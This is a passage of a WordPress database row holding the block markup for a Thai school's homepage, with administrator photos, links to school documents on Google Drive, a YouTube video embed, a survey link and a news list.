(701,1,'2025-07-15 15:57:56','2025-07-15 08:57:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - 